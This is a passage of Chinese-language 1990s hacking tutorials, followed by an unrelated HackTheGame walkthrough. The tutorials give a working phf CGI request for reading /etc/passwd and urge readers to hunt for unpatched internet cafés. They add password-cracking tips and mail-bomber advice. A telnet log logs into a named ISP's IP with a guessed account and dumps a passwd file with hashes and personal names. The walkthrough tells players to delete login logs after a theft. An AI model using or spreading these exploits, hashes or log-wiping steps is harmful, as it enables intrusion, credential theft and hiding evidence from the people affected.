里有猜身份证字号的功能耶)[4]不用在字典中查得到的字作为密码.那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型, 基於这个密码猜法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调?? 如果你的密码是coolfire,建议你最好能改成CoolFire 或coolfires (加复数"s"),这样被猜中的机率就小了很多. 如果你是一个Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@**正式的话题这次的话题当然还是Crack, 相信许多人已经看过CoolHC#1 了,当然眼尖的人可能也已经D/LSystem Holes 试过了, 你有成功的例子吗?? 如果没有, 这份CoolHC#2可能就是你的强心针,因为这次谈的正是System Holes #1 成功的案例.Step 1. 连线到"蕃薯藤" 找"网路咖啡" 找到好多家网路咖啡的WWW 网址, 一一连上去试试看在System Holes #1 中的方法可不可行.Step 2. 若可行则会传回/etc/passwd 资讯, 存档後迅速Logout, 使用Crack Jack解读!![[实例探讨]]System Holes #1 中所介绍的WWW 入侵法是这样子的:/cgi-bin/nph-test-cgi?* 後再/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd[1] 用WWW Browser 连到[2] Location 输入--> "/cgi-bin/nph-test-cgi?*"[3] 接著如果出来一份像Report 的画面的话, 接著输入/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd[4] 发生了甚麽事?? etc/passwd 在你的浏览器中"显示" 出来了!! 快点Save 吧!!这个方法所用的是系统"检索" 的漏洞, 不提供这个功能,或是伺服器检索类型不同的机器则不会接受这样的指令, 当然也就逃过我们这次的模拟演练啦!! 但是.... 相信我,你一定会找到一家脱线的网路咖啡, 并没有像我们一样每天阅读Mail List 的信,对系统安全一点研究也没有的人不在少数. 就是这样的一个Net Coffee Shop... 呵.... 快来试试吧!!当CoolFire 抓到/etc/passwd 後, 立刻存档, 也马上断线, 并且拿出UltraEdit 来瞧一下使用者的资讯, 当然这个小passwd 对Crack Jack 来说, 实在是不够看,没几分钟就在我的486 机器上显示出来几个以UserName 作为Password 的资讯(归功於PaSs2DiC 及CrackJack 的功劳)不过当我试著找寻root 的密码时, 一想到我那将近20 万字的字典档,就想到可能花费的时间一定相当的惊人, 於是就以Jack 的Option 设定只寻找root 那一行, ...(过了良久)... 果不然又是一个笨root. 用了"非常" 容易猜的密码... <--- This is JackAss... 呵!! GotIt!如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用Crack Jack,不然你也可以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是486DX4-13032MB RAM, 3.2GB HDD, 近20 万字的字典档, 如果在分析较大的passwd档时我会将字典档切割为四至五个小档(看有多少台机器可跑),然後在周末下班前在公司的几台机器上分别执行CrackJack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd 档又很大的话,由於Crack Jack 无法於Windoz 95 下使用, 你可能只能牺升时间或机器来跑了! 再没有办法的话, 亦可使用单机多工, 多开几个DOS Box 来跑Brute, 也许也是一个可行的办法!**後语有许多人在使用Crack Jack 的时候有许多问题, 不过看了CoolHC#1 应该都解决了吧?? 最近大家问的比较多的是UpYours 3.0, 虽然已经改进了Install 的问题,不过大家的问题还是都出在Winsck.ocx 上面, 有人说装了MSICP Beta 会好?? 但也有实例装了也还不能Run 的,在此建议大家不要再玩MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,已经证实有许多常用的MailBomb 没有办法Fake IP 了!! 所以... 如果UpYours 3.0装不起来的人就试试KaBoom!V3.0 吧! 虽然没有办法Fake IP (选错Mail Server 的话), 但是也是一个不错的AnonyMailer如果要发匿名信, 现在首页上有可以帮你发信的Mailer, 会安全一点.如果你仍旧对UpYours 3.0 不死心, 就试试ResSvr32.exe (Under Windows/systemdirectory),看看能不能将WinSck.ocx 装上了... 记得先UnReg 再Reg...在此建议大家可以多订阅一些"系统安全" 讨论的Mail List或多参考一些已经被找出来的系统漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,如果能够多参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,放在手边参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是SendMail 的Bug 实例,在这中间当然照往例会先出一份System Holes #2 来作为资料. 如果有兴趣的人在SH#2 出来的时候可以先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......------上次讲的Home Page 建置案还没搞完, 没有充实一下Home Page 实在是对不起大家,所以利用一点时间写了CoolHC#2, 可能报告又交不出来了!! 老话,如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 目前准备收集一系列的System Hole List,如果你在其它的站台有看到的, 请把它先Cut 下来, Mail 一份给我!------再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (高-Net 还是除外)... 请勿将这类技术使用於破坏上(又...如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它Shut Down.... 好了! 别太暴力了!CoolFire系列讲座第3讲:如何连接ISP并且对其解码作者:CoolFire [coolfires@] (2001-10-13 08:05:00) CoolHC Volume 3 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!前几次说到了Net Coffee 店, 还好他们没有提供客户拨接上线的功能, 不然密码或是帐号被人盗用的客户不就糗大了! 但是CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的W3 密码,误入一个号称第一个提供网路拨接的ISP, 且在CoolFire 顺利的抓回/etc/passwd 之後, 使用了自己写的PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了9 组ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到root password, 不然可能该系统就此停摆, 不可再见天日也! (当然我不可能这么作啦!).看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上CoolFire 最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强, 可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃! 大家要小心呀!ISP 是一般User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念(Password 的设定及proxy 的使用等), 实在不敢想像这样的网路发展到几年後会是甚么样子??这一次的说明还是没有谈到新的技巧, 在James 将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯(入侵本国的网路则不用, 反正没人重视网路安全..... 真失望), 在别人还没将Bug 修正之前就抢先一步拿到/etc/passwd, 所以订阅一些网路安全的Mail List 是必要的, 多看一些网安有关的News Group 也是必要的(不仅Hacker 如此, ISP 更要多注意这些资讯!). 日後有空再整里一些Mail List 给大家!!本次主题: 说明如何连接该ISP 并且对其/etc/passwd 解码连接位址: (203.66.169.11)特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以CoolFire 已经Mail 给该网页之维护人员更改密码, 但该网页之ISP 仍为新手之练习好题材! CoolFire Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!Mail sent to dhacme@:Subject: 请速更动网页密码From: CoolFire <coolfires@>你的网页作得不错, 但是因为你所设定的密码太容易为骇客所? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!!**** 课程开始****请注意: 由於本次所作的课程内容以实作为主, 除了本人IP 有所更改, 一切都使用本人所用之Telnet 软体Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容, 否则本人概不负责!(连线到某一主机之後.... 此处的.tw 是假的Domain name).tw> telnet Trying 203.66.169.11...Connected to .Escape character is '^]'.Password: (随便按一下Enter)Login incorrectwww login: coffee (以Hacker 的敏锐判断username=coffee password=coffee)Password:Last login: Thu Jan 9 10:41:52 from .tw欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!================================================================= (直接进入核心部份)www:~$ cd /etcwww:/etc$ lsDIR_COLORS hosts.equiv printcapHOSTNAME hosts.lpd profile NETWORKING inet@ protocolsNNTP_INEWS_DOMAIN inetd.conf psdevtabX11@ inittab rc.d/at.deny inittab.gettyps.sample resolv.confbootptab ioctl.save rpccsh.cshrc issue securettycsh.login securetty.olddefault/ klogd.pid sendmail.cfdiphosts ld.so.cache sendmail.stexports ld.so.conf servicesfastboot lilo/ shellsfdprm lilo.conf shutdownpidfs/ localtime skel/fstab magic slip.hostsftp.banner mail.rc slip.loginftp.deny motd snooptabftpaccess motd.bak sudoersftpconversions msgs/ syslog.confftpgroups mtab syslog.pidftpusers mtools termcapgateways named.boot ttysgettydefs networks utmp@group nntpserver vga/host.conf passwd wtmp@hosts passwd.OLD yp.conf.example hosts.allow passwd.oldhosts.deny ppp/(看看我们的目标长得如何???)www:/etc$ cat passwdroot:abcdefghijklmn:0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/usr/lib/news:uucp:*:10:14:uucp:/var/spool/uucppublic:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashnobody:*:-1:100:nobody:/dev/null:ftp:*:404:1::/home/ftp:/bin/bashguest:*:405:100:guest:/dev/null:/dev/nullshan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bashfax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bashtham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bashccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bashsk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bashservices:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bashrichard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bashlilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bashsupport:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bashstonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/cshbear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bashlance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bashcaves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bashsales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bashkingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bashrecycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bashrecycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bashrecycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bashhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bashgoodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bashrwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bashcharliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bashslb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bashs6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bashlsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bashlilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bashnalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bashtoonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bashyahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bashbasic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bashwunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bashkaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bas hfan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash(CoolFire 注: 因为使用PaSs2DiC 很容易找出ID 与Password 相同的. 故除了Coffee 外, 其它我找到密码的EnCode Password 部份皆改过..... 除非你一个一个试啦~~~ 我没说喔!)www:/etc$ exitlogoutConnection closed by foreign host.(可以走了!! 改用FTP 将/etc/passwd 给抓回来吧!).tw> ftp Connected to .220-220- 欢迎光临....... 以下略! 因涉及该ISP 的名誉, 大家自己去看吧!220-220-220- There are 0 users in FTP Server now.220- 目前已有0 使用者在此Server 上.220- If you have any suggestion, please mail to:220- service@xx.xxxxxxx.xxx.xx.220-220-220-220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.(还是使用刚刚的帐号进入)Name (:YourName): coffee331 Password required for coffee.Password:230 User coffee logged in.Remote system type is UNIX.Using binary mode to transfer files.(直接到达档案放置地点)ftp> cd /etc250 CWD command successful.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.ttysfdprmgroupissuemotdmtoolsprofilesecurettyshellstermcapskelcsh.cshrccsh.loginlilo。

（⿊客游戏）HackTheGame1.21过关攻略第⼀关：标题 : 您好来⾃ : chaozz@----------------------------------------------------------您好 hahaya,我对你寄予⾮常⾼的期望, 您的计算机技能远⾼于正常⽔平, 所以我猜你⾄少能够过2关.您的第⼀个⽬标是获得⼀个port扫描⼯具。

我知道⼀台计算机上能够找到这种⼯具。

您须要⼊侵该系统才⼲获得这⼀⼯具。

⼯具的⽂件名称是: PortScannerW32.exe它应该在⼀个名叫HackTools的⽬录中。

下⾯是这项任务中你所须要的⼀些数据:他的IP地址: 124.171.181.65开放port : 2657username : secret密码 : admin1234⾸先Ping他的IP地址看看他是否在线。

然后⽤他的IP和port远程登陆到他的电脑，窃取到⽂件后迅速离开！!! 注意 !!不要忘记删除TelnetLogs⽬录中的⽇志⽂件。

你应该删除的是: 192.168.010.001祝您好运。

假设你成功了，我将再次向您发送电⼦邮件。

chaozz第⼀步：ping要⼊侵ip地址的主机是否在线第⼆步：使⽤telnet通过指定的port进⾏连接第三步：输⼊提供的username和password,然后Enter进⼊第四步：进⼊系统的第⼀件事最好是删除⾃⼰的登录⽇志，即del 192.168.010.001，以免后来忘记删除。

第五步：切换到指定⽂件夹下，⽤提供的Get File⼯具下载PortScannerW32.exe第六步：点击断开连接第⼆关：标题 : ⼲的好！来⾃ : chaozz@----------------------------------------------------------⼲的好 hahaya,好了，你得到了portscanner。

如今您将须要安装它。

要做到这⼀点请到您的Downloads⽬录中，全部您从远程计算机上下载/窃取到的⽂件都被储存在那⾥。